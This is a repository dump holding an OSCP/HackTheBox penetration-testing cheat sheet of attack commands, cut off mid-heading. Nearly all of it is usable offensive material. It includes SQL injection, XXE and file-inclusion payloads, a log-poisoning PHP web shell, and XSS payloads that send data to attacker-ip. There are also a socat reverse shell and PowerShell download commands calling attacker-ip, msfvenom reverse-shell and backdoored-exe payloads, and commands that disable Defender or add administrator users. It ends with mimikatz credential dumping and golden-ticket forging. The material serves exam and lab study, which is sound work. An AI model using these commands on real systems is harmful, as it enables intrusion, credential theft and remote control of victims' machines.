[
  {
    "path": "README.md",
    "content": "# OSCP / HackTheBox\n\nThese are my notes and exploits I wrote while preparing for the OSCP and playing CTF on HackTheBox.\n\n## Cheatsheet usage\n\nThe cheatsheet is meant to be as searchable as possible.\nAs such you have the following options to search for an entry:\n\n1. You can search for a known **toolname**:\n\t- example: \"gobuster\"\n\t- example: \"rpcclient\"\n2. You can search for the targeted **service**:\n\t- example: \"service: smb\"\n\t- example: \"service: ftp\"\n3. You can search for **MITRE-tactics**:\n\t- example: \"tactics: enumeration\"\n\t- example: \"tactics: lateral_movement\"\n4. You can search for tool **suites**:\n\t- example: \"suites: impacket\"\n\t- example: \"suites: powershell_empire\"\n\nSome parts of this document still need some work. Feel free to submit a PR.\n\n\n## Exploit-Development\n\nI moved this folder to its own [repository](https://github.com/tagnullde/Exploit-Development)\n\n"
  },
  {
    "path": "oscp-cheatsheet.md",
    "content": "# OSCP-Cheatsheet\n\n# nmap\n- service: all\n- tactics: enumeration\n\n## enumerate services and use default scripts\n- `nmap -sC -sV -oN normal.txt target-ip`\n\n## scan all tcp ports\n- `nmap -p- -oN all_ports.txt target-ip`\n\n## scan all udp ports\n- `nmap -p- -sU -oN all_udp_ports.txt target-ip`\n\n## use script categories\n- `nmap --script vuln,safe,discovery -oN scan.txt target-ip`\n\n## list all nse scripts\n- `ls -lh /usr/share/nmap/scripts/`\n\n## nmap through socks4 proxy\n- `nmap --proxies socks4://proxy-ip:1080 target-ip`\n\n## ftp bounce scan\n- `nmap -P0 -n -b username:password@target-ip target2-ip --proxies socks4://proxy-ip:1080 -vvvv`\n\n---\n\n# gobuster\n- service: http\n- tactics: enumeration\n\n## bruteforce web directories and files by extension\n- `gobuster dir -u http://target-ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 30`\n\n---\n\n# wfuzz\n- service: http\n- tactics: enumeration\n\n## bruteforce web parameter\n- `wfuzz -u http://target-ip/path/index.php?param=FUZZ -w /usr/share/wordlists/rockyou.txt`\n\n## bruteforce post data (login)\n- `wfuzz -u http://target-ip/path/index.php?action=authenticate -d 'username=admin&password=FUZZ' -w /usr/share/wordlists/rockyou.txt`\n\n---\n\n# ffuf\n- service: http\n- tactics: enumeration\n\n## bruteforce web directories\n- `ffuf -w /path/to/wordlist -u https://target/FUZZ`\n\n---\n\n# davtest\n- service: webdav\n- tactics: enumeration\n\n## tries to upload (executable) files to webdav\n- `davtest -url http://target-ip/ -sendbd auto`\n\n---\n\n# peass - privilege escalation awesome scripts suite\n- service: windows\n- service: linux\n- tactics: enumeration\n\n## very easy to use on linux\n- `./linpeas.sh`\n\n## windows has multiple versions\n- `winpeasx64.exe`\n- `winpeasx86.exe`\n- `winpeas.bat`\n\n---\n\n# capabilities\n- service: linux\n- tactics: privilege_escalation\n\n```\n# Check the links at the bottom for more examples and 
explanation\n```\n## exploit `cap_setuid` capability on python3 to gain a local root-shell\n- `python3 -c 'import os; os.setuid(0); os.system(\"/bin/sh\")'`\n\n---\n\n# mount\n- service: smb\n- service: nfs\n- tactics: enumeration\n- tactics: initial_access\n\n## mount shares\n- `mount -o hard,nolock target-ip:/home folder`\n- `mount -t cifs -o user=username,domain=domainname //target-ip/share /mnt/folder`\n- `mount -t nfs target-ip:share /mnt/folder -o nolock`\n\n---\n\n# showmount\n- service: nfs\n- tactics: enumeration\n\n## list nfs shares\n- `showmount -e target-ip`\n\n---\n\n# enum4linux\n- service: all\n- tactics: enumeration\n\n## scan target-ip\n- `enum4linux target-ip`\n\n---\n\n# rpcdump.py\n- service: rpc\n- tactics: enumeration\n- suites: impacket\n\n## dump rpc endpoints\n- `/opt/impacket/examples/rpcdump.py username:password@target-ip`\n\n---\n\n# lookupsid.py\n- service: rpc\n- tactics: enumeration\n- suites: impacket\n\n## get sid via rpc\n- `/opt/impacket/examples/lookupsid.py username:password@target-ip`\n\n---\n\n# smbclient.py\n- service: smb\n- tactics: enumeration\n- tactics: initial_access\n- suites: impacket\n\n## semi-interactive smb-client\n- `python3 /opt/impacket/examples/smbclient.py username@target-ip`\n- `python3 /opt/impacket/examples/smbclient.py 'username'@target-ip`\n- `python3 /opt/impacket/examples/smbclient.py ''@target-ip`\n\n---\n\n# snmpwalk\n- service: snmp\n- tactics: enumeration\n\n## gather snmp v1 information with standard community strings\n- `snmpwalk -v1 -c public target-ip`\n- `snmpwalk -v1 -c private target-ip`\n- `snmpwalk -v1 -c manager target-ip`\n\n## enumerate windows users\n- `snmpwalk -c public -v1 target-ip 1.3.6.1.4.1.77.1.2.25`\n\n## enumerate current windows processes\n- `snmpwalk -c public -v1 target-ip 1.3.6.1.2.1.25.4.2.1.2`\n\n## enumerate windows open tcp ports\n- `snmpwalk -c public -v1 target-ip 1.3.6.1.2.1.6.13.1.3`\n\n## enumerate installed software\n- `snmpwalk -c public -v1 target-ip 
1.3.6.1.2.1.25.6.3.1.2`\n\n## make use of MIB files and translate the OIDs automatically\n- default folder for MIB files: `/usr/share/snmp/mibs`\n- `export MIBS=ALL`\n\n---\n\n# onesixtyone\n- service: snmp\n- tactics: enumeration\n\n## bruteforce community strings\n```bash\necho public > community.txt\necho private >> community.txt\necho manager >> community.txt\nfor ip in $(seq 200 254); do echo 1.2.3.${ip}; done > target-ip.txt\n```\n\n- `onesixtyone -c community.txt -i target-ip.txt`\n\n---\n\n# rpcclient\n- service: rpc\n- tactics: enumeration\n- tactics: initial_access\n\n## get information via rpc with username\n- `rpcclient -U username target-ip`\n\n## get information via rpc without username\n- `rpcclient -U \"\" target-ip`\n\n### sub-commands once connected\n- `srvinfo`\n- `lookupnames username`\n\n---\n\n# ftp\n- service: ftp\n- tactics: enumeration\n- tactics: initial_access\n\n## login via ftp\n- `ftp target-ip`\n\n### anonymous login\n- `username: anonymous`\n- `password: anonymous`\n\n---\n\n# XML External Entity (XXE)\n\n- service: http\n- tactics: enumeration\n- tactics: initial_access\n\n## Read local files\n\n```xml\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n<!DOCTYPE replace [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n<foo>\n  <something>&xxe;</something>\n</foo>\n```\n\n## Read binary files or files that otherwise can't be displayed (.php)\n\n```xml\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n<!DOCTYPE replace [<!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=db.php\">]>\n<foo>\n  <something>&xxe;</something>\n</foo>\n```\n\n---\n\n# JSON Web Token (JWT)\n\n- service: http\n- tactics: initial_access\n\n## Sign JWT with own key - might need a webserver serving the public key (referenced via the kid header)\n\n```bash\npython3 jwt_tool.py [eyJ0eXAiOiJKV1QiLCJhbG..snip..] 
-I -hc kid -hv \"http://<IP>/jwt.pub\" -pc <admin_cap> -pv <1> -S rs256 -pr jwt.key\n```\n\n---\n\n# ldapsearch\n- service: ldap\n- tactics: discovery\n\n## anonymous bind and dump the base dn\n- `ldapsearch -x -h target-ip -b \"dc=domain,dc=tld\"`\n\n---\n\n# windapsearch.py\n- service: ldap\n- tactics: discovery\n\n## enumerate all domain users with a bind account\n- `./windapsearch.py -d host.domain.tld -u domain\\\\ldapbind -p password -U`\n\n---\n\n# evil-winrm\n- service: winrm\n- tactics: lateral_movement\n\n## get shell via evil-winrm\n- `./evil-winrm.rb -u username -p password -i target-ip`\n\n---\n\n# telnet\n- service: smtp\n- service: pop\n- service: telnet\n- tactics: collection\n\n## send mail via telnet\n\n```\n# connect\ntelnet target-ip 25\n\n# provide valid or fake email-address\nEHLO username@domain.tld\n\n# set mail-from\nMAIL FROM: <username@domain>\n\n# set recipient-to\nRCPT TO: <target-username@target-domain.tld>\n\n# set body and send mail (the 354 line is the server's reply)\nDATA\n354 Ok Send data ending with <CRLF>.<CRLF>\nFROM: username@domain\n\nHello World!\n.\n```\n\n## get mails via pop3\n\n```\n# connect\ntelnet target-ip 110\n\n# login\nUSER username\nPASS password\n\n# list emails\nLIST\n\n# retrieve emails\nRETR 1\n```\n\n---\n\n# smtp-user-enum\n- service: smtp\n- tactics: enumeration\n\n## verify that a user exists on the system, with a higher delay to make sure we get all responses\n- `smtp-user-enum -M VRFY -U user-file -t target-ip -m 60 -w 20`\n\n---\n\n# nikto\n- service: http\n- tactics: enumeration\n\n## scan website for vulnerabilities\n- `nikto -C all -h http://target-ip`\n\n---\n\n# wpscan\n- service: http\n- tactics: enumeration\n\n## scan wordpress installation for vulnerabilities\n- `wpscan --url http://target-ip/ --enumerate p`\n\n---\n\n# nc\n- service: all\n- tactics: enumeration\n- tactics: initial_access\n\n## logfile injection\n```\nnc target-ip target-port\nGET /<?php passthru($_GET['cmd']); ?> HTTP/1.1\nHost: <IP>\nConnection: close\n```\n\n### Afterwards include it via lfi\n- 
`?lfi_file=/var/log/apache2/access.log&cmd=<command>`\n\n---\n\n# dig\n- service: dns\n- tactics: enumeration\n\n## full zone transfer\n- `dig -t AXFR domain.tld @target-dns-ip`\n\n---\n\n# host\n- service: dns\n- tactics: enumeration\n\n## full zone transfer\n- `host -l domain.tld target-dns-ip`\n\n---\n\n# mysqldump\n- service: sql\n- tactics: initial_access\n\n## backup all mysql databases\n- `mysqldump -u username -ppassword --all-databases --single-transaction`\n\n---\n\n# sqli\n- service: sql\n- service: http\n- tactics: initial_access\n\n## find the number of columns and a column that is reflected in the output\n- `http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8`\n\n## get the version of the database\n- `http://target-ip/inj.php?id=1 union all select 1,2,3,@@version,5`\n\n## get the current user\n- `http://target-ip/inj.php?id=1 union all select 1,2,3,user(),5`\n\n## see all tables\n- `http://target-ip/inj.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables`\n\n## get column names for a specified table\n- `http://target-ip/inj.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users'`\n\n## concat user names and passwords (0x3a represents \":\")\n- `http://target-ip/inj.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users`\n\n## write into a file\n- `http://target-ip/inj.php?id=1 union all select 1,2,3,\"content\",5 into OUTFILE 'outfile'`\n\n---\n\n# searchsploit\n- service: all\n- tactics: enumeration\n\n## filter search for specific kernel versions\n- `searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6`\n\n---\n\n# curl\n- service: http\n- service: imap\n- tactics: exfiltration\n\n## download emails via curl\n- `curl --insecure --url \"imaps://target-domain/Drafts;UID=4\" --user \"username:password\"`\n\n## bypass useragent blacklisting\n- `curl -A \"Googlebot\" http://target-ip/robots.txt`\n\n---\n\n# scp\n- service: ssh\n- tactics: initial_access\n\n## copy 
file from target\n- `scp -r username@target-ip:/path/to/foo /home/username/desktop/`\n\n---\n\n# ssh\n- service: ssh\n- tactics: initial_access\n- tactics: lateral_movement\n\n## create ssh-key\n- `ssh-keygen`\n\n### add public-key to authorized_keys\n- `cat id_rsa.pub >> ~/.ssh/authorized_keys`\n\n### set permission on private-key\n- `chmod 600 id_rsa`\n\n## login via ssh-key\n- `ssh -i id_rsa username@target-ip`\n\n### login with older ciphers\n- `ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes128-cbc username@target-ip`\n\n## ssh through an http proxy (ProxyCommand with ncat)\n- `ssh username@target-ip -o \"ProxyCommand=ncat --proxy-type http --proxy target-ip:proxy-port 127.0.0.1 22\"`\n\n## local ssh port forwarding\n- `ssh -N -L 80:127.0.0.1:80 username@target-ip`\n\n## dynamic ssh port forward\n- `ssh -N -D 9050 username@target-ip`\n\n---\n\n# proxychains\n- service: ssh\n- tactics: lateral_movement\n\n## a dynamic ssh tunnel is needed\n> search ssh\n\n## prefix the command with `proxychains` to use the socks proxy\n- `proxychains nmap -sTV -n -PN -p 80,22 target-ip -vv`\n\n> Double pivot works the same, but you create the 2nd ssh tunnel via proxychains and a different dynamic port. 
\nAfter the tunnel is up, you can comment out the first socks entry in proxychains config.\n\n---\n\n# sshuttle\n- service: ssh\n- tactics: lateral_movement\n\n## pivot via sshuttle\n- `sshuttle -vr <via-ssh-server> <Remote-Net-To-Route>`\n- `sshuttle -vr username@target-ip 10.1.1.0/24`\n\n---\n\n# smbmap\n- service: smb\n- tactics: discovery\n\n## guest login\n- `smbmap -u whateverusername -H target-ip`\n\n## anonymous login\n- `smbmap -H target-ip`\n\n---\n\n# smbserver.py\n- service: smb\n- tactics: exfiltration\n- suites: impacket\n\n## fake smb server for uploading and downloading files\n- `python3 /opt/impacket/examples/smbserver.py -smb2support files $(pwd)`\n\n---\n\n# pth-smbclient\n- service: smb\n- service: ntlm\n- tactics: lateral_movement\n- suites: pth-toolkit\n\n## connect to target-share and auth via ntlm-hash\n- `pth-smbclient --user=username --pw-nt-hash -m smb3 \\\\\\\\target-ip\\\\target-share ntlm-hash`\n\n---\n\n# pth-winexe\n- service: smb\n- service: ntlm\n- tactics: lateral_movement\n- suites: pth-toolkit\n\n## run command on target-ip and auth via ntlm-hash\n- `pth-winexe -U 'username%ntlm-hash' //target-ip cmd`\n\n---\n\n# vinagre\n- service: vnc\n- tactics: lateral_movement\n\n## vnc connect\n- `vinagre`\n\n---\n\n# medusa\n- service: http\n- service: basic_auth\n- tactics: credential_access\n\n## bruteforce basic_auth\n- `medusa -h target-ip -U ../creds/usernames.txt -P ../creds/passwords.txt -M http -m DIR:/printers -T 10`\n\n---\n\n# hydra\n- service: http\n- service: http_post\n- service: sql\n- tactics: credential_access\n\n## bruteforce http_post with example post-data (the string after the last colon is the failure condition)\n- `hydra -l root@localhost -P /usr/share/wordlists/rockyou.txt target-ip http-post-form \"/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-60&User=^USER^&Password=^PASS^:Login failed!\"`\n\n## bruteforce mssql\n- `hydra -l sa -P ../creds/pass.txt target-ip -s target-port mssql`\n\n---\n\n# patator\n- service: ssh\n- tactics: credential_access\n\n## bruteforce 
ssh\n- `patator ssh_login host=target-ip port=22 user=username password=FILE0 0=/opt/SecLists/Passwords/probable-v2-top1575.txt`\n- Optional: `-x ignore:fgrep='failed.'`\n\n---\n\n# burp\n- service: http\n- tactics: enumeration\n\n## bypass ip blacklist / whitelist\n- `X-Forwarded-For: $allowed-ip`\n\n---\n\n# xss payloads\n- service: http\n- tactics: initial_access\n\n## xss enumeration payloads\n- `'\">><script>new Image().src=\"attacker-ip:81/bogus.php?output=\"+navigator.appName;</script>`\n- `'\">><script>new Image().src=\"attacker-ip:81/bogus.php?output=\"+navigator.appVersion;</script>`\n- `'\">><script>new Image().src=\"attacker-ip:81/bogus.php?output=\"+navigator.platform;</script>`\n\n## xss redirect to own webserver\n- `'\">><script>document.location=\"http://attacker-ip:81\";</script>`\n- `'\">><script>window.location=\"http://attacker-ip:81\";</script>`\n\n---\n\n# local file inclusion / remote file inclusion\n- service: http\n- service: php\n- tactics: initial_access\n\n## including remote code\n- `?file=[http|https|ftp]://evilsite.com/shell.txt`\n\n## using php stream php://input (specify your payload in the post data)\n- `?file=php://input`\n\n## using zip wrapper zip://\n- `?file=zip://path/file.zip%23rce.php`\n\n## using php stream php://filter\n- `?file=php://filter/convert.base64-encode/resource=index.php`\n\n## using data uri\n- `?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=`\n\n## using xss\n- `?file=http://127.0.0.1/path/xss.php?xss=phpcode`\n\n## inject php code in logfile with nc and retrieve it afterwards\n> search for nc\n\n---\n\n# mssqlclient.py\n- service: sql\n- tactics: lateral_movement\n- suites: impacket\n\n## connect to windows mssql server\n- `mssqlclient.py -windows-auth username@target-ip`\n\n## list all databases\n- `select name from sys.databases`\n- `select name from master.dbo.sysdatabases`\n\n## use database\n- `use [database]`\n\n## get tables\n- `select * from 
[database].information_schema.tables`\n\n---\n\n# mssql-cli\n- service: sql\n- tactics: lateral_movement\n\n## connect to windows mssql server\n- `mssql-cli -S target-ip -U username`\n\n---\n\n# bloodhound\n- service: ldap\n- service: active_directory\n- tactics: lateral_movement\n- tactics: privilege_escalation\n\n## invoke-bloodhound from sharphound.ps1\n- `import-module .\\sharphound.ps1`\n- `invoke-bloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password`\n\n---\n\n# getnpusers.py\n- service: kerberos\n- tactics: credential_access\n- tactics: lateral_movement\n\n## check ASREPRoast for all domain users (credentials required)\n- `python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>`\n\n## check ASREPRoast for a list of users (no credentials required)\n- `python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>`\n\n## check kerberoast\n- `impacket-GetUserSPNs '<domain>/<username>:<password>' -dc-ip <ip-of-domain-controller> -request`\n\n## crack as_rep_response_file\n> search for hashcat / john\n\n---\n\n# hashcat\n- service: all\n- tactics: credential_access\n\n## crack as_rep_response_file (asreproast)\n- `hashcat -m 18200 -a 0 as_rep_response_file passwords_file`\n\n## crack TGSs_file (kerberoast)\n- `hashcat -m 13100 --force TGSs_file passwords_file`\n\n---\n\n# john\n- service: all\n- tactics: credential_access\n\n## crack as_rep_response_file (asreproast)\n- `john --wordlist=passwords_file as_rep_response_file`\n\n## crack TGSs_file (kerberoast)\n- `john --format=krb5tgs --wordlist=passwords_file TGSs_file`\n\n## mangle wordlist\n- `john --wordlist=month --rules --stdout > new_list`\n\n## crack ssh keys\n- `/usr/share/john/ssh2john.py id_rsa > hash.john`\n- `john 
--wordlist=/usr/share/wordlists/rockyou.txt hash.john`\n\n---\n\n# secretsdump.py\n- service: kerberos\n- tactics: credential_access\n- suites: impacket\n\n## dcsync\n- `/usr/share/doc/python3-impacket/examples/secretsdump.py username@target-ip -dc-ip target-ip`\n\n---\n\n# invoke-kerberoast.ps1\n- service: kerberos\n- tactics: credential_access\n- suites: powershell_empire\n\n## execute invoke-kerberoast.ps1\n- `invoke-kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>`\n\n---\n\n# gettgt.py\n- service: kerberos\n- tactics: credential_access\n- suites: impacket\n\n## overpass the hash\n\n### Request the TGT with hash\n- `python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>`\n\n### Request the TGT with aesKey (more secure encryption and probably stealthier, since it is what Microsoft uses by default)\n- `python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>`\n\n### Request the TGT with password\n- `python getTGT.py <domain_name>/<user_name>:[password]`\n\n### Set the TGT for impacket use\n- `export KRB5CCNAME=<TGT_ccache_file>`\n\n### Execute remote commands with any of the following tools by using the TGT\n> search for psexec.py, smbexec.py or wmiexec.py\n\n---\n\n# ticket_converter.py\n- service: kerberos\n- tactics: credential_access\n\n## convert tickets between linux / windows format\n[ticket_converter.py](https://github.com/Zer1t0/ticket_converter):\n\n- `python ticket_converter.py ticket.kirbi ticket.ccache`\n- `python ticket_converter.py ticket.ccache ticket.kirbi`\n\n### to use the ticket\n> search for gettgt.py\n\n---\n\n# mimikatz\n- service: kerberos\n- tactics: credential_access\n\n## enable log\n- `log filename.log`\n\n## request SeDebugPrivilege (needed to read lsass)\n- `privilege::debug`\n\n## dump passwords from memory\n- `sekurlsa::logonpasswords`\n\n## dump passwords from sam database\n- `lsadump::sam /system:f:\\SYSTEM /sam:f:\\SAM`\n\n## export tickets\n- `sekurlsa::tickets /export`\n\n## 
pass the hash\n- `sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash`\n\n## silver_ticket\n### to generate the TGS with NTLM (hash of the service account)\n- `mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>`\n\n### to generate the TGS with AES 128 key\n- `mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<service_account_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>`\n\n### to generate the TGS with AES 256 key (more secure encryption and probably stealthier, since it is what Microsoft uses by default)\n- `mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<service_account_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>`\n\n### inject TGS with mimikatz\n- `mimikatz # kerberos::ptt <ticket_kirbi_file>`\n\n## golden_ticket\n\n### to generate the TGT with NTLM\n- `mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>`\n\n### to generate the TGT with AES 128 key\n- `mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>`\n\n### to generate the TGT with AES 256 key (more secure encryption and probably stealthier, since it is what Microsoft uses by default)\n- `mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>`\n\n### inject TGT with mimikatz\n- `mimikatz # kerberos::ptt <ticket_kirbi_file>`\n\n---\n\n# ticketer.py\n- service: kerberos\n- tactics: credential_access\n- suites: impacket\n\n## silver_ticket\n\n### to generate the TGS with NTLM\n- `python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>`\n\n### to generate the TGS with AES key\n- `python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn 
<service_spn> <user_name>`\n\n### set the TGS for impacket use\n- `export KRB5CCNAME=<TGS_ccache_file>`\n\n## golden_ticket\n\n### to generate the TGT with NTLM\n- `python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>`\n\n### to generate the TGT with AES key\n- `python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>`\n\n### set the TGT for impacket use\n- `export KRB5CCNAME=<TGT_ccache_file>`\n\n> search for psexec.py, smbexec.py or wmiexec.py\n\n---\n\n# psexec.py\n- service: rpc\n- tactics: lateral_movement\n- suites: impacket\n\n## execute remote commands using the ticket set in KRB5CCNAME\n- `python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass`\n\n---\n\n# smbexec.py\n- service: smb\n- tactics: lateral_movement\n- suites: impacket\n\n## execute remote commands using the ticket set in KRB5CCNAME\n- `python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass`\n\n---\n\n# wmiexec.py\n- service: wmi\n- tactics: lateral_movement\n- suites: impacket\n\n## execute remote commands using the ticket set in KRB5CCNAME\n- `python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass`\n\n---\n\n# psexec.exe\n- service: smb\n- tactics: lateral_movement\n- suites: pstools\n\n## run psexec\n- `.\\PsExec.exe -accepteula \\\\<remote_hostname> cmd`\n- `PsExec64.exe \\\\<remote_hostname> -u <username> -p <password> shell64.exe`\n\n---\n\n# gcc\n- service: all\n- tactics: weaponization\n\n## cross compile for 32bit (m32) and all linux flavors (gnu, sysv)\n- `apt-get install libc6-dev-i386`\n- `gcc -m32 -Wall -Wl,--hash-style=both 9545.c -o exploit`\n\n## cross compile for 32bit windows (on 64bit linux)\n- `i686-w64-mingw32-gcc -o ms11-046.exe ms11-046.c -lws2_32`\n\n## cross compile for 32bit windows (on 32bit linux)\n- `apt-get install mingw32`\n- `i586-mingw32msvc-gcc <source>.c -o <outfile> -lws2_32`\n\n## static 
application\n> To compile static applications add the `-static` parameter\n\n## skeleton c code which calls system()\n\n```c\n#include <stdlib.h>\n\nint main(void)\n{\n    /* system() runs the string through the shell; keep the return value if you need the exit status */\n    int i = system(\"net localgroup administrators theusername /add\");\n    (void)i;\n    return 0;\n}\n```\n\n---\n\n# pyinstaller.py\n- service: all\n- tactics: weaponization\n\n## generate exe from python file in windows\n- `python pyinstaller.py --onefile <pythonscript>`\n\n---\n\n# reg.exe\n- service: sam\n- tactics: credential_access\n\n## dump sam database\n- `reg save HKLM\\sam sam`\n- `reg save HKLM\\system system`\n\n## query vnc passwords\n- `reg query \"HKCU\\Software\\ORL\\WinVNC3\\Password\"`\n\n## Windows autologin\n- `reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\"`\n- `reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\" 2>nul | findstr \"DefaultUserName DefaultDomainName DefaultPassword\"`\n\n---\n\n# samdump2\n- service: sam\n- tactics: credential_access\n\n## dump hashes from the saved SYSTEM and SAM hives\n- `samdump2 SYSTEM SAM > hashes.db`\n\n---\n\n# unshadow\n- service: sam\n- tactics: credential_access\n\n## combine /etc/passwd and /etc/shadow into one file for john (passwd first, then shadow)\n- `unshadow passwd shadow > unshadow.db`\n\n---\n\n# plink.exe\n- service: all\n- tactics: lateral_movement\n\n## Port forward using plink\n- `plink.exe -l username -pw password target-ip -R 8080:127.0.0.1:8080`\n\n---\n\n# socat\n- service: all\n- tactics: command_and_control\n\n## reverse_shell\n### attacker\n- ``socat file:`tty`,raw,echo=0 tcp-listen:12345``\n\n### target\n- `socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:attacker-ip:12345`\n\n---\n\n# runas\n- service: windows\n- tactics: privilege_escalation\n\n## privileged file copy\n- `runas /user:hostname\\Administrator /savecred \"cmd.exe /c type c:\\users\\administrator\\desktop\\root.txt > C:\\Users\\security\\AppData\\Local\\Temp\\root.txt\"`\n\n## privileged powershell execution\n- `runas /user:hostname\\Administrator /savecred \"powershell -ExecutionPolicy Bypass -File 
C:\\Users\\security\\AppData\\Local\\Temp\\boom.ps1\"`\n\n## privileged cmd execution\n- `runas /user:administrator /savecred cmd.exe`\n\n---\n\n# powershell\n- service: windows\n- tactics: execution\n\n## download a file to the target via powershell\n- `powershell Invoke-WebRequest \"http://attacker-ip:81/x41.csproj\" -OutFile \"C:\\ProgramData\\x41.csproj\"`\n- `powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -Command \"(New-Object System.Net.WebClient).DownloadFile('http://attacker-ip/rev.exe', 'C:\\ProgramData\\rev.exe')\"`\n\n## disable defender real-time monitoring\n- `Set-MpPreference -DisableRealtimeMonitoring $true`\n\n---\n\n# potato.exe\n- service: windows\n- tactics: privilege_escalation\n\n## hot potato usage\n- `potato.exe -ip <local ip> -cmd \"c:\\\\windows\\\\system32\\\\cmd.exe /K net users username password /add\" -disable_exhaust true`\n\n---\n\n# Metasploit\n- service: all\n- tactics: command_and_control\n\n## Port forward using meterpreter\n- `portfwd add -l <attacker port> -p <victim port> -r <victim ip>`\n- `portfwd add -l 3306 -p 3306 -r 192.168.1.101`\n\n---\n\n# msfvenom\n- service: all\n- tactics: weaponization\n\n## Linux ELF binary\n- `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf`\n\n## Windows EXE binary\n- `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe`\n\n### 32 Bit\n- `msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=10.10.12.XX lport=1337 -f exe > shell32.exe`\n\n### 64 Bit\n- `msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=10.10.12.XX lport=1337 -f exe > shell64.exe`\n\n## Windows Service\n- `msfvenom -p windows/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> EXITFUNC=thread -f exe-service > shell-service.exe`\n\n## Mac\n- `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> 
LPORT=<Your Port to Connect On> -f macho > shell.macho`\n\n## PHP\n- `msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > /tmp/shell.php && sed -i 's/#<?php/<?php/' /tmp/shell.php`\n\n> If you use php/reverse_php open the output file with an editor and add `<?php` and `?>` within the script.\n\n## ASP\n- `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp`\n\n## JSP\n- `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp`\n\n## WAR\n- `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war`\n\n## Inject payload into an existing exe file\n- `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -x <template EXE> -f exe > <output.exe>`\n\n## dep bypass payload\n- `windows/meterpreter/reverse_nonx_tcp`\n\n## multi handler\n```\nmsfconsole\nuse exploit/multi/handler\nset payload windows/meterpreter/reverse_tcp\nset AutoRunScript post/windows/manage/migrate\nset lhost 10.10.12.102\nset lport 9001\nexploit\n```\n\n---\n\n# misc\n## python injected shell\n- `__builtins__.__import__('os').system('/bin/bash -i')`\n\n# exploit development\n## finding offset\n### gef\n- `pattern create 128`\n- `pattern search 0x61616161`\n\n### msf\n- `/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000`\n- `/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP-Content>`\n\n### pwntools\n```python\nfrom pwn import *\n\n# n=4 for 32-bit targets, n=8 for 64-bit targets\npattern = cyclic(128, n=4)\n\n# look up the offset of the 4-byte value found in EIP\n# (0x61616161 is the register value, not an address)\noffset = cyclic_find(0x61616161, n=4)\n```\n\n## find \"jmp esp\" with mona.py\n- `!mona find -type instr -s \"jmp esp\" -m <DLL>`\n\n## list of bad 
